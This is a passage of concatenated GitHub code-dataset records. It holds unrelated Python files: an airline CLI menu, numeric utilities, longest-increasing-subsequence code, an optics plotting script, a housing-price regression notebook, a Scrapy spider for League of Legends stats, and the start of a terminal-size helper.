\"4\":\n voyageYear = input(\" - Input year: \")\n voyagetWeek = input(\" - Input week of the year: \")\n allVoyagesWeek = UIAPI.UIAPI.viewallVoyagesWeek(self, voyageYear, voyagetWeek)\n printObjects(allVoyagesWeek)\n viewVoyagesInput = View.viewVoyages(self)\n elif viewVoyagesInput == \"b\":\n return viewVoyagesInput\n elif viewVoyagesInput == \"q\":\n return viewVoyagesInput\n else:\n print(\"Wrong input, try again!\")\n viewVoyagesInput = View.viewVoyages(self)\n return viewVoyagesInput\n\n def viewFlight(self):\n print('''5. View Flights\n--------------------------------------------\n 1. View specific flight\n 2. View all flights\n 3. View active flights\n 4. View cancelled/landed flights\n--------------------------------------------''')\n\n viewFlightInput = input(\"Input choice (q to Quit, b for Back): \")\n viewFlightInput = viewFlightInput.lower()\n if viewFlightInput == \"1\":\n flightNumber = input(\" - Input flight number: \")\n flightDate = makeDateFromInput()\n if flightDate != \"b\":\n viewFlight = UIAPI.UIAPI.viewCertainFlight(self, flightNumber, flightDate)\n printObjects(viewFlight)\n viewFlightInput = View.viewFlight(self)\n if viewFlightInput == \"2\":\n allFlights = UIAPI.UIAPI.viewAllFlights(self)\n printObjects(allFlights)\n viewFlightInput = View.viewFlight(self)\n if viewFlightInput == \"3\":\n viewActiveFlights = UIAPI.UIAPI.viewFlightsByStatuses(self, [\"On schedule\", \"Loading\", \"In-Air\"])\n printObjects(viewActiveFlights)\n viewFlightInput = View.viewFlight(self)\n if viewFlightInput == \"4\":\n viewCancelledFlights = UIAPI.UIAPI.viewFlightsByStatuses(self, [\"Landed\", \"Cancelled\"])\n printObjects(viewCancelledFlights)\n viewFlightInput = View.viewFlight(self)\n elif viewFlightInput == \"b\":\n return viewFlightInput\n elif viewFlightInput == \"q\":\n return viewFlightInput\n else:\n print(\"Wrong input, try again!\")\n viewFlightInput = View.viewFlight(self)\n return viewFlightInput\n","repo_name":"TheRobertSnow/HR_Dropouts","sub_path":"NaN_Air/UI_layer/View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":16877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36970797152","text":"#!/usr/bin/python3\n# file name: math.py\n# author: codepasser\n# date: 2022/9/6\nfrom decimal import Decimal\nfrom typing import List\n\nimport numpy as np\n\n\nclass Math:\n __scale: str = None\n\n def __init__(self, scale: str = '0.0000'):\n self.__scale = scale\n\n def fixed(self, _item: float) -> float:\n \"\"\"\n 保留有效数字\n :param _item: 值\n :return: 结果\n \"\"\"\n return float(Decimal('%16f' % _item).quantize(Decimal(self.__scale)))\n\n def fixed_multi(self, _items: List[float]) -> List[float]:\n \"\"\"\n 保留有效数字(数组全部元素)\n :param _items: 值-数组\n :return: 结果-数组\n \"\"\"\n _result: List[float] = []\n for i in range(len(_items)):\n _fixed = self.fixed(_items[i])\n _result.append(_fixed)\n return _result\n\n def is_integer(self, _val) -> bool:\n \"\"\"\n 是否为整数值\n :param _val: 值\n :return: 结果\n \"\"\"\n _val = Decimal('%16f' % _val).quantize(Decimal(self.__scale))\n _count_dot = str(_val).count('.')\n if _count_dot == 0:\n return True\n _s_val = str(_val).split('.')\n if len(_s_val) == 1:\n return True\n if len(_s_val) == 2 and _s_val[1] == '0000':\n return True\n else:\n return False\n\n @staticmethod\n def computed_ln(_items: List[float]) -> List[float]:\n \"\"\"\n 注意点:若样本中含有0或负数无需取ln值\n 保留有效数字(数组全部元素)并计算数组数据的ln值\n :param _items: 值-数组\n :return: 结果-数组\n \"\"\"\n _result: List[float] = []\n for i in range(len(_items)):\n _ln_result = np.log(_items[i])\n _result.append(_ln_result)\n return _result\n\n @staticmethod\n def computed_ln_current(_item: float) -> float:\n \"\"\"\n 注意点:若样本中含有0或负数无需取ln值\n 计算当前数据的ln值\n :param _item: 值-当前值\n :return: 结果-当前值取对数\n \"\"\"\n return np.log(_item)\n\n @staticmethod\n def is_computed_ln(_items: List[float]) -> bool:\n \"\"\"\n 直接获取列表最小数值 判断其是否 > 0\n :param _items: 值-数组\n :return: 结果-最小值是否是正数\n \"\"\"\n return min(_items) > 0 if _items else False\n\n @staticmethod\n def sub_abs(_items: List[float], _field_avg: float) -> List[float]:\n \"\"\"\n 综合指标:\n i.以50%为界限,所有数据减去50%,再取绝对值,做标准正态,越小越好;\n ii.以行业平均为界限,分行业取平均值,所有数据减去所在行业的平均值,再取绝对值,做标准正态,越小越好;\n :param _items: 值-数组\n :param _field_avg: 值-所在行业平均值\n :return: 结果-数组\n \"\"\"\n _result: List[float] = []\n for i in range(len(_items)):\n _sub_result = abs(_items[i] - _field_avg)\n _result.append(_sub_result)\n return _result\n\n @staticmethod\n def sub_abs_current(_item: float, _field_avg: float) -> float:\n \"\"\"\n 综合指标:\n i.以50%为界限,所有数据减去50%,再取绝对值,做标准正态,越小越好;\n ii.以行业平均为界限,分行业取平均值,所有数据减去所在行业的平均值,再取绝对值,做标准正态,越小越好;\n :param _item: 值-当前值\n :param _field_avg: 值-所在行业平均值\n :return: 结果-当前值取减平均值 取对数\n \"\"\"\n return abs(_item - _field_avg)\n","repo_name":"codepasser-source/01_technology_0010_python","sub_path":"source/esign-pipline/src/common/utils/math.py","file_name":"math.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34056295057","text":"\"\"\"\nLongest Increasing Subsequence problem on strings\n\"\"\"\n\ndef recursive_LIS_helper(X, i):\n if i == 0:\n return 1\n \n # recursively call only on previous characters that would from an IS\n smaller_precedessors = [j for j in range(i) if X[j] < X[i]]\n \n if len(smaller_precedessors) == 0:\n return 1\n else:\n Y = list(map(lambda j: recursive_LIS_helper(X,j), smaller_precedessors))\n return 1 + max(Y)\n\ndef recursive_LIS(X):\n # recursive implementation of longest increasing subsequence\n return max(list(map(lambda i: recursive_LIS_helper(X, i), range(len(X)))))\n\n# the following instance doesn't compute in reasonable time\n# s = \"ABCDEFGHIJKLMNOPQRSTUVZ\"\n# recursive_LSS(s*3)\n\ndef dynamic_LIS(X):\n # dynamic programming implementation of LIS\n n = len(X)\n if n == 1:\n return 1\n V = [1]*n\n \n for i in range(1,n): \n for j in range(i):\n if X[j] < X[i] and V[j]+1 > V[i]:\n V[i] = V[j] + 1\n \n return max(V)","repo_name":"ClemRec/ADM_HW","sub_path":"ADM_HW03/longest_subqsequence.py","file_name":"longest_subqsequence.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31848402309","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nhybrid_source_file=['ray-tracing-on-slit-200um-as-source-in-srw.txt']#hybrid shares the same source file at slit\n\nhybrid_on_slit_file=['ray-tracing-on-slit-5um.txt','ray-tracing-on-slit-10um.txt','ray-tracing-on-slit-50um.txt','ray-tracing-on-slit-100um.txt']\n#hybrid shares the same distribution file at slit\n\nhybrid_slit_smaller_source_file=['hybrid-slit-5um_smaller-source.txt','hybrid-slit-10um_smaller-source.txt','hybrid-slit-50um_smaller-source.txt','hybrid-slit-100um_smaller-source.txt']\n\nhybrid_mirror_smaller_source_file=['hybrid-mirror-5um_smaller-source.txt','hybrid-mirror-10um_smaller-source.txt','hybrid-mirror-50um_smaller-source.txt','hybrid-mirror-100um_smaller-source.txt']\n\nhybrid_mirror_with_error1_smaller_source_file=['hybrid-mirror-5um_smaller-source-with-error1.txt','hybrid-mirror-10um_smaller-source-with-error1.txt','hybrid-mirror-50um_smaller-source-with-error1.txt','hybrid-mirror-100um_smaller-source-with-error1.txt']\n\nlegenddict_hybrid=[r\"5$\\mu$m slit hybrid\",r\"10$\\mu$m slit hybrid\",r\"50$\\mu$m slit hybrid\",r\"100$\\mu$m slit hybrid\"]\n\naxis_config_on_slit=[[-100,100],[0,0.01],[x*0.001 for x in range(0,11)]]\naxis_config_slit=axis_config_on_slit\naxis_config_mirror=[[-0.8,0.8],[0,1],[x*0.1 for x in range(0,11)]]\naxis_config_mirror_error=[[-0.8,0.8],[0,1],[x*0.1 for x in range(0,11)]]\n\naxis_config=[axis_config_on_slit,axis_config_slit,axis_config_mirror,axis_config_mirror_error]\n\nhybrid_title=['hybrid on-slit calculation','hybrid slit calculation','hybrid slit & mirror calculation','hybrid slit & mirror(error) calculation']\n\nsampling_step=2\n#to use the sampling setting as configured\n#2 for data from shadow histgrom widget because of double sampling\n#1 for data from 1D wavefront from SRW(&worfy) widgets\n#you can also set it larger to undersample the data\nsimulation_index=3\n#0-on slit; \n#1-slit diffraction; \n#2-focusing by mirror; \n#3-focusing by mirror with error\nfile_gather=[hybrid_on_slit_file,hybrid_slit_smaller_source_file,hybrid_mirror_smaller_source_file,hybrid_mirror_with_error1_smaller_source_file]\n\ndef image_plot(filename):\n with open(filename) as f1:\n lines1 = f1.readlines()\n x = [line.split()[0] for line in lines1]\n y = [line.split()[1] for line in lines1]\n xx=[float(i) for i in x]\n yy=[float(i) for i in y]\n \n xxx=xx[::sampling_step]#shadow widget plot does not double sample\n yyy=yy[::sampling_step]#shadow widget plot does not double sample\n return(xxx,yyy,sum([round(i) for i in yyy]))\n(x_source,y_source,source_sum)=image_plot(hybrid_source_file[0])\nprint(source_sum)\nfor i in range(4):\n (xxx_noerr,yyy1_noerr,yyysum)=image_plot(file_gather[simulation_index][i])\n delta_xxxlist=[xxx_noerr[i+1]-xxx_noerr[i] for i in range(0,len(xxx_noerr)-1)]\n delta_xxx=round(sum(delta_xxxlist)/len(delta_xxxlist),4)\n print('delta_xxx :',delta_xxx)\n plt.plot(xxx_noerr,[j/source_sum/delta_xxx for j in yyy1_noerr],label=legenddict_hybrid[i]+'/'+str(round(yyysum/source_sum,4)))\nplt.legend(loc='upper left', shadow=True)\naxes = plt.gca()\naxes.set_xlim(axis_config[simulation_index][0])\naxes.set_ylim(axis_config[simulation_index][1])\nplt.yticks(axis_config[simulation_index][2])\nplt.xlabel(r\"horizontal coordinate/$\\mu$m\")\nplt.ylabel(\"sampled ray ratio/sampling step\")\nplt.title(hybrid_title[simulation_index]+'('+str(delta_xxx)+r'$\\mu$m step)')\nplt.show()","repo_name":"tumatu/OASYS_Workplace","sub_path":"Compare_SRW/plot_hybrid_slit_1m.py","file_name":"plot_hybrid_slit_1m.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6676894151","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.3.4\n# kernelspec:\n# display_name: 'Python 3.7.6 64-bit (''base'': conda)'\n# language: python\n# name: python37664bitbaseconda78814975a87e45dd93a41087a924c115\n# ---\n\nimport pandas as pd\n# %pylab inline\n\n# file_path = r\"../pre_processed_data/pre_processed.csv\"\nfile_path = r\"C:\\Users\\jason\\OneDrive\\Documents\\Jason\\NYC Data Science Academy\\projects\\machine_learning\\ghub_work_area\\pre_processed_data\\pre_processed.csv\"\n# import pre_processed file \npre_process_df = pd.read_csv(filepath_or_buffer=file_path, index_col=0, header=0)\npre_process_df.sample(5)\n\n# + pycharm={\"is_executing\": false}\nlen(pre_process_df.columns)\n\n# +\n# remove target variables from data frame\nX = pre_process_df.loc[:, pre_process_df.columns.difference([\"saleprice\", \"log_saleprice\"])]\n\ny = pre_process_df[\"saleprice\"]\ny_log = pre_process_df[\"log_saleprice\"]\n\nprint(X.shape)\nprint(y.shape)\ny_log.shape\n\n# +\n# train, test split with train set to 80%\n# A linear regression model will be evaluated first in the absence of regularization\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size= 0.2, random_state=42)\nX_train_log, X_test_log, y_train_log, y_test_log = train_test_split(X, y_log, test_size= 0.2, random_state=42)\n\n# +\nfrom sklearn.linear_model import HuberRegressor, LinearRegression\n# Evaluation of Huber regressor against SalePrice w/o log-transform \n# Huber regression is a linear model that is more robust to outliers than the standard model, which penalizes the model\n# for higher deviations.\n\nhr = HuberRegressor()\nhr.fit(X=X_train, y=y_train)\nprint(f\"Train R2 is {hr.score(X=X_train, y=y_train)}\")\nprint(f\"Test R2 is {hr.score(X=X_test, y=y_test)}\")\n# -\n\n# Standard regression w/o log transform \nlr = LinearRegression()\nlr.fit(X=X_train, y=y_train)\nprint(f\"Train R2 is {lr.score(X=X_train, y=y_train)}\")\nprint(f\"Test R2 is {lr.score(X=X_test, y=y_test)}\")\n\n# +\n# Standard regression w/log transform \nlr_log = LinearRegression()\nlr_log.fit(X=X_train_log, y=y_train_log)\nprint(f\"Train R2 is {lr_log.score(X=X_train_log, y=y_train_log)}\")\nprint(f\"Test R2 is {lr_log.score(X=X_test_log, y=y_test_log)}\")\n\n# There is a slight improvement (~2%) in the train R2 and test R2 utilizing log transform \n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# ## Model Evaluation - Linear Regression\n# ### The following section evaluates the random error, constant variance and normal distribution with mean 0 assumption of linear model in the context of the four initial models utilizing a residual plot from Yellowbrick.\n#\n# -\n\n# Residual Plot for Huber LR with no log-transform\nfrom yellowbrick.regressor import ResidualsPlot\nrpv_hr = ResidualsPlot(hr)\nrpv_hr.fit(X=X_train, y=y_train)\nrpv_hr.score(X=X_test, y=y_test)\nrpv_hr.poof()\n\nrpv_lr = ResidualsPlot(lr)\nrpv_lr.fit(X=X_train, y=y_train)\nrpv_lr.score(X=X_test, y=y_test)\nrpv_lr.poof()\n\n\n# Residual Plot for LR with log transform \nrpv_lr_log = ResidualsPlot(lr_log)\nrpv_lr_log.fit(X=X_train_log, y=y_train_log)\nrpv_lr_log.score(X=X_test_log, y=y_test_log)\nrpv_lr_log.poof()\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# ## Model Evaluation of Ordinary Least Squares -Log Transform\n# - Evaluation of log-transformed OLS model as the residuals plot appeared to satisfy most of the principal assumptions of linear regression. \n# -\n\nimport statsmodels.api as sm\nX_add_constant = sm.add_constant(X_train_log)\nols_log = sm.OLS(y_train_log, X_add_constant)\nans_log = ols_log.fit()\nprint(ans_log.summary())\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# - based on the OLS review, several factors are deemed non-significant by the model (e.g., there is not enough evidience to support that they are important to predicting sales price). These preidctors are bedrooms, lotfrontage, and whether a home is a new home. \n# - There are several coefficients that on the surface do not appear to make sense - namely the negative coefficient associated with two_plus_cr_garabe, this coefficient is negative whereas the domain association with this feature being that a two car or more garage capacity is good for a house. \n# - The model will be recaliberated dropping these three features.\n# - homeage is being excluded in favor of remodelage due to its lower significance. \n# - garagecars is being dropped because there is an overalp between that variable and the \"two_plus_cr_garg\" feature\n\n# +\nX_train_log = X_train_log.loc[:, X.columns.difference([\"bedroomsabvgr\", \"lotfrontage\", \"newHome\", \"homeage\", \"garagecars\"])]\nX_test_log = X_test_log.loc[:, X.columns.difference([\"bedroomsabvgr\", \"lotfrontage\", \"newHome\", \"homeage\", \"garagecars\"])]\n\n\nlr_log.fit(X=X_train_log, y=y_train_log)\nlr_log.score(X=X_test_log, y=y_test_log)\nprint(f\"Train R2 is {lr_log.score(X=X_train_log, y=y_train_log)}\")\nprint(f\"Test R2 is {lr_log.score(X=X_test_log, y=y_test_log)}\")\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# - The train and test R2 are very similar to the model (e.g., 90/89%) prior to dropping the four variables. \n# - The residual plot and stats model output will be evaluated to confirm that the prior assumptions still hold as well as to identify any other items to potentiall exclude before proceeding to cross-validation.\n#\n# -\n\nrpv_lr_log = ResidualsPlot(lr_log)\nrpv_lr_log.fit(X=X_train_log, y=y_train_log)\nrpv_lr_log.score(X=X_test_log, y=y_test_log)\nrpv_lr_log.poof()\n\nX_add_constant = sm.add_constant(X_train_log)\nols_log = sm.OLS(y_train_log, X_add_constant)\nans_log = ols_log.fit()\nprint(ans_log.summary())\n\n\n# - Evaluation of OLS for non-log LR\n\nX_add_constant_non_log = sm.add_constant(X_train)\nols = sm.OLS(y_train, X_add_constant_non_log)\nans = ols.fit()\nprint(ans.summary())\n\n# + pycharm={\"is_executing\": false}\n# Prediction error plot to further evaluate normality of residual distribution\nfrom yellowbrick.regressor import prediction_error\n\nvisualizer = prediction_error(lr_log, X_train_log, y_train_log)\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# - qq plot of prediction error appears to follow in a straight line, which is indicative of a normally distributed error term.\n#\n\n# + pycharm={\"is_executing\": false}\nfrom yellowbrick.regressor import cooks_distance\n\ncd_visualizer = cooks_distance(X=X_train, y=y_train_log)\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# ## Cross Validation through YellowBrick\n# ### **Evaluation of R2 over 4-fold Cross-Validation**\n# - linear log model is evaluated via 4-k fold\n\n# +\nfrom sklearn.model_selection import KFold\n\nfrom yellowbrick.model_selection import CVScores\n\n# Instantiate the KFold settings\ncv = KFold(n_splits=4, random_state=42)\n\ncv_visualizer = CVScores(model=lr_log, cv=cv, scoring=\"r2\")\n\ncv_visualizer.fit(X=X_train_log, y=y_train_log) # fit data into visualizer \ncv_visualizer.poof()\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# - Median cross-validation R2 score is 89% and fairly consistent. \n# - Evaluating next via sci-kit learn's model selection package\n#\n# -\n\n# ### **Evaluation of RMSE (Root Mean Square Error)**\n\n# +\nfrom sklearn.model_selection import cross_val_score\nlr_r2_scores = cross_val_score(estimator = lr_log, X = X_train_log, y = y_train_log, scoring = 'r2', cv= 4)\nlr_rmse = -1 * cross_val_score(estimator= lr_log, X = X_train_log, y = y_train_log, scoring = \"neg_root_mean_squared_error\", cv=4)\nlr_mse = -1 * cross_val_score(estimator= lr_log, X = X_train_log, y = y_train_log, scoring = \"neg_mean_squared_error\", cv=4)\nlr_mae = -1 * cross_val_score(estimator= lr_log, X = X_train_log, y = y_train_log, scoring = \"neg_median_absolute_error\", cv=4)\n\ndef display_cv_scores(scores):\n print(\"Scores:\", scores)\n print(\"Mean:\", scores.mean())\n print(\"Standard Deviation:\", scores.std())\n \nprint(\"CV scores for R2 are:\") \ndisplay_cv_scores(lr_r2_scores)\nprint(\"\")\nprint(\"CV scores for RMSE are:\")\ndisplay_cv_scores(lr_rmse)\nprint(\"\")\nprint(\"CV scores for MSE are:\")\ndisplay_cv_scores(lr_mse)\nprint(\"\")\nprint(\"CV scores for MAE are:\")\ndisplay_cv_scores(lr_mae)\n\n# +\ncv_rmse = KFold(n_splits=4, random_state=42)\n\n# note that scikit-learn's implementation of RMSE is negative root mean squared error \ncv_visualizer_rmse = CVScores(model=lr_log, cv=cv, scoring=\"neg_median_absolute_error\")\n\ncv_visualizer_rmse.fit(X=X_train_log, y=y_train_log) # fit data into visualizer \ncv_visualizer_rmse.poof()\n# -\n\n\n\n# + [markdown] pycharm={\"name\": \"#%% md\\n\"}\n# - Based upon cross-validation and test R2, we appear to have a strong and consistent predictor of housing prices.\n# - The mean average is .89, which is also the value of the test R2 on the 20% hold out test-set. The standard deviation is also fairly low (e.g., 1.3%), which indicates that our model is not overly sensitive to the input data set.\n#\n# -\n\n# ## VIF Evaluation\n#\n# - VIF (Variance Inflation Factor) is reviewed to determine if there is any multi-collinearity. Generally, any feature with a VIF value of 5 or higher is generally regarded as a feature that is likely to be co-linear with another feature or combination of other features in the model. \n\n# +\nfrom patsy import dmatrices\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\n\nfeatures_vif = \"+\".join(X_train_log.columns)\n\nfeatures_target = pd.concat([X_train_log, y_train_log], axis=\"columns\")\n\ny_VIF, X_VIF = dmatrices('log_saleprice ~' + features_vif, features_target, return_type = \"dataframe\")\n\nvif = pd.DataFrame()\nvif[\"VIF Factor\"] = [variance_inflation_factor(X_VIF.values, i) for i in range(X_VIF.shape[1])]\nvif[\"features\"] = X_VIF.columns\n\nvif.round(1)\n\n# -\n\n# - There are no features with a VIF factor greater than 5, the general cutoff for multicollinearity \"concern.\" The highest VIF value are 3.1 and 3.2 for adj_ovr_qual and good_ament_ct, respctively.\n\n# ## Model Output as Picket Object\n# - Output of model object to be utilized in prediction\n\n# +\nfrom joblib import dump\n\n#dump(lr_log, '../model_files/lr_log_model.joblib')\ndump(lr_log, r\"C:\\Users\\jason\\OneDrive\\Documents\\Jason\\NYC Data Science Academy\\projects\\machine_learning\\ghub_work_area\\model_files\\lr_log_model.joblib\")\n# -\n\nlr_log.predict(X_test_log)\n\n\nX_test_log.columns\n\n# + [markdown] pycharm={\"name\": \"#%%\\n\"}\n# # Additonal Model Evaluation \n# ## **Feature Importance**\n# ### 1. Lasso Evaluation\n# - Relatively and on a holistic level, seeing which feature coefficients are \"pushed\" to zero via a Lasso Regularization can indicate the relative importance of those features to a model. \n# - To utilize a regularization method - even for evaluation purposes - it is general good practice to standardize the input variables first prior to fitting the model.\n# -\n\nfrom sklearn import preprocessing\nstd = preprocessing.StandardScaler()\nX_train_log_std = std.fit_transform(X_train_log)\n\n# +\nfrom sklearn import linear_model\nlasso_model = linear_model.LassoLarsCV(\n cv=4, max_n_alphas=10\n).fit(X_train_log_std, y_train_log)\nfig, ax = plt.subplots(figsize=(12, 8))\ncm = iter(\n plt.get_cmap(\"tab20\")(\n np.linspace(0, 1, X_train_log_std.shape[1])\n )\n)\nfor i in range(X_train_log_std.shape[1]):\n c = next(cm)\n ax.plot(\n lasso_model.alphas_,\n lasso_model.coef_path_.T[:, i],\n c=c,\n alpha=0.8,\n label=X_train_log.columns[i],\n )\n\nax.axvline(\n lasso_model.alpha_,\n linestyle=\"-\",\n c=\"k\",\n label=\"alphaCV\",\n)\n\nplt.ylabel(\"Regression Coefficients\")\nax.legend(X_train_log.columns, bbox_to_anchor=(1,1))\nplt.xlabel(\"alpha\")\nplt.title(\n \"Regression Coefficients Progression for Lasso Paths\"\n)\nfig.savefig(\n \"mlpr_lasso_w_bsmt_adj.png\",\n dpi=300,\n bbox_inches=\"tight\",\n)\n# -\n\n# - The visualization of the Lasso regularization with increasing alphas indicates that the most significant factors are building square feet, adjusted overall quality, good amenities count, total baths and bad amenities count.\n\n# ### 2. Mutual Information\n# - Scikit learn's mutual information score for regressions helps to quantifies the amount of information gained by including the feature listed. \n# - The value is bounded between 0 and 1. If the value is zero, there is no relationship between the target and the feature. \n\n# +\nfrom sklearn import feature_selection\n\nmic = feature_selection.mutual_info_regression(\n X_train_log, y_train_log\n)\n\nfig, ax = plt.subplots(figsize=(10, 8))\n(\n pd.DataFrame(\n {\"feature\": X_train_log.columns, \"vimp\": mic}\n )\n .set_index(\"feature\")\n .plot.barh(ax=ax)\n)\nfig.savefig(\"mutual_info.png\")\n# -\n\n# **Conclusions**\n# - This visualization largely confirms the same relatively most important features (e.g., square footage, overall quality) that the Lasso visualization conferred. It does appear to note that abnormal sales and single family home are not signficant factors, which a little harder to visually distill in the Lassso chart.\n\n# ### 3. SHAP (SHaply Additive exPlanations)\n# - The SHAP library for Python has several nice visualizations that help to inform how predictors influence the output of the model.\n# - The below summary chart helps us to see the global effect of features on the target log sales price. For example, high values of building sqft increase the model output and lower values by contrast lower the target variable.\n\n# +\nimport shap\nshap.initjs()\n\nexp = shap.LinearExplainer(model = lr_log, data=X_train_log)\nvals = exp.shap_values(X_train_log)\nfig, ax = plt.subplots(figsize=(6, 4))\nshap.summary_plot(vals, X_train_log)\nfig.savefig(\n \"shap_summary_plt_reduced.png\",\n bbox_inches=\"tight\",\n dpi=300,\n)\n# -\n\n# - Another method of more narrowly looking at overall feature importance versus inspection of how different value of a feature impact the model, which reflects the mean absoluate SHAP value. \n\nshap.summary_plot(vals, X_train_log, plot_type=\"bar\")\n\n# ** Conclusion **\n# - Similar to the Lasso and mutual information graphs - the SHAP summary plot of feature importance highlights the same top factors in terms of overall impact (sq footage, overall quality, total baths, good amentity count).\n\n# # Example Predictions (For Purposes of Presentation)\n\n# +\ny_test_log_predict = lr_log.predict(X_test_log)\ny_test_predict_Series = pd.DataFrame(data=y_test_log_predict, index=y_test_log.index, columns=[\"log_saleprice_predict\"])\n\ntest_set_w_predict = pd.concat([X_test_log, y_test_log, y_test_predict_Series], axis=\"columns\")\n# -\n\ntest_set_w_predict.sample(5)\n\ntest_set_w_predict[\"saleprice\"] = np.exp(test_set_w_predict[\"log_saleprice\"])\ntest_set_w_predict[\"saleprice_predict\"] = np.exp(test_set_w_predict[\"log_saleprice_predict\"])\ntest_set_w_predict[\"residual\"] = test_set_w_predict.saleprice - test_set_w_predict.saleprice_predict\n\n\ntest_set_w_predict.sample(5)\n\nfile_path_train = r\"C:\\Users\\jason\\OneDrive\\Documents\\Jason\\NYC Data Science Academy\\projects\\machine_learning\\ghub_work_area\\data\\train.csv\"\ntrain_df = pd.read_csv(file_path_train, header=0, index_col=0)\ntrain_df.loc[[1095, 68, 1216, 531, 1290], [\"YrSold\", \"YearRemodAdd\", \"YearBuilt\"]]\n\ntest_set_w_predict[[\"residual\"]].aggregate([mean, median, np.std])\n\ntest_set_w_predict[[\"residual\"]].hist()\nplt.xlabel(\"$ Dollars\")\nplt.ylabel(\"Count\")\nplt.title(\"Difference in Sale Price: Actual Less Predicted\")\nplt.savefig(\"Histogram_of_Residuals.png\")\n\ntest_set_w_predict[\"perc_miss\"] = test_set_w_predict[\"residual\"]/test_set_w_predict[\"saleprice\"]\n\ntest_set_w_predict[\"perc_miss\"].abs().median()\n\ntest_set_w_predict[\"perc_miss\"].abs().mean()\n\n\n","repo_name":"jwattier/nycdsa_housing_ml_project","sub_path":"code/linear_model.py","file_name":"linear_model.py","file_ext":"py","file_size_in_byte":15554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11063038615","text":"###################################################################################################\n#\n# MODULO: opgg.py\n# DESCRIPCIÓN: Este es el spider que efectuará el trabajo de webscraping sobre la web op.gg\n# AUTOR: Rubén Moya Vázquez\n# EMAIL: rmoyav@uoc.edu\n#\n###################################################################################################\n\nimport scrapy\nfrom lolScraper.items import Champion\nfrom lolScraper.config import *\n\nclass OpggSpider(scrapy.Spider):\n \"\"\"[summary]\n\n Args:\n scrapy ([type]): [description]\n\n Yields:\n [type]: [description]\n \"\"\"\n\n # Nombre del spider\n name = 'opgg'\n\n # Dominio al que accederá\n allowed_domains = DOMAINS\n\n # Servidores a los que accederá\n servers = SERVERS\n\n # Urls de inicio del crawling\n start_urls = [URL.format(server=x) for x in servers]\n\n def parse_champions(self, response):\n \"\"\"\n Esta funcion es la que efectuará la lectura y filtrado de los perfiles de los campeones\n de manera que podamos obtener los atributos que nos interesan\n\n Args:\n response (Response): La web con el perfil del campeón seleccionado en la request.\n Yields:\n scrapy.items.Champion : El objeto campeon obtenido de filtrar la respuesta.\n \"\"\"\n \n # Objeto que representa a nuestro campeon.\n champion = Champion()\n\n champion['server'] = response.url.split('/')[2].split('.')[0]\n\n # Nombre del campeón\n name = response.xpath(XPATHS_CHAMPION['name']).extract()\n if isinstance(name, list) and name:\n name = name[0]\n\n champion['name'] = name\n\n # Rol que desempeña en la partida\n position = response.xpath(XPATHS_CHAMPION['position']).extract()\n if isinstance(position, list):\n position = position[0]\n champion['position'] = position\n\n # Tier al que pertenece\n champion['tier'] = response.xpath(XPATHS_CHAMPION['tier']).extract()[0]\n \n\n rates = response.xpath(XPATHS_CHAMPION['rate']).extract()\n if isinstance(rates, list) and len(rates) == 2:\n # Ratio de victorias \n champion['win_rate'] = float(rates[0].split('%')[0])\n\n # Porcentaje de veces seleccionado\n champion['pick_rate'] = float(rates[1].split('%')[0])\n\n yield champion\n \n def parse(self, response):\n \"\"\"\n Función principal del spider. Su estructura y nombre vienen dados por defecto al crear\n el proyecto con scrapy. Su funcion es recorrer el listado de urls de los campeones y\n llamar a 'parse_champions' con cada respuesta obtenida.\n\n Args:\n response (Response): La web con el perfil del campeón seleccionado en la request.\n\n Yields:\n scrapy.Request: La petición a la url de cada campeón.\n \"\"\"\n champions = response.xpath(STEP).extract()\n for champ in champions:\n yield scrapy.Request(url='https://' + response.url.split('/')[2] + champ, callback=self.parse_champions)\n","repo_name":"rmoyav/TIPOLOGIA_PRA_1","sub_path":"lolScraper/lolScraper/spiders/opgg.py","file_name":"opgg.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70462838971","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os\nimport sys\nimport errno\nimport operator\nimport locale\nfrom linstor_client.consts import (\n DEFAULT_TERM_HEIGHT,\n DEFAULT_TERM_WIDTH,\n Color\n)\n\nPYTHON2 = True\n\nif sys.version_info > (3, 0):\n PYTHON2 = False\n unicode = str\n\n\n# TODO(rck): still a hack\nclass SyntaxException(Exception):\n pass\n\n\ndef get_terminal_size():\n def ioctl_GWINSZ(term_fd):\n term_dim = None\n try:\n import termios\n import struct\n import fcntl\n term_dim = struct.unpack(\n 'hh',\n fcntl.ioctl(term_fd, termios.TIOCGWINSZ, '1234')\n )\n except (ImportError, IOError, OSError):\n pass\n return term_dim\n # Assign the first value that's not a NoneType\n term_dim = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)\n if not term_dim:\n try:\n with os.open(os.ctermid(), os.O_RDONLY) as term_fd:\n term_dim = ioctl_GWINSZ(term_fd)\n except (AttributeError, IOError, OSError):\n pass\n try:\n (term_width, term_height) = int(term_dim[1]), int(term_dim[0])\n except (IndexError, TypeError):\n term_width = DEFAULT_TERM_WIDTH\n term_height = DEFAULT_TERM_HEIGHT\n return term_width, 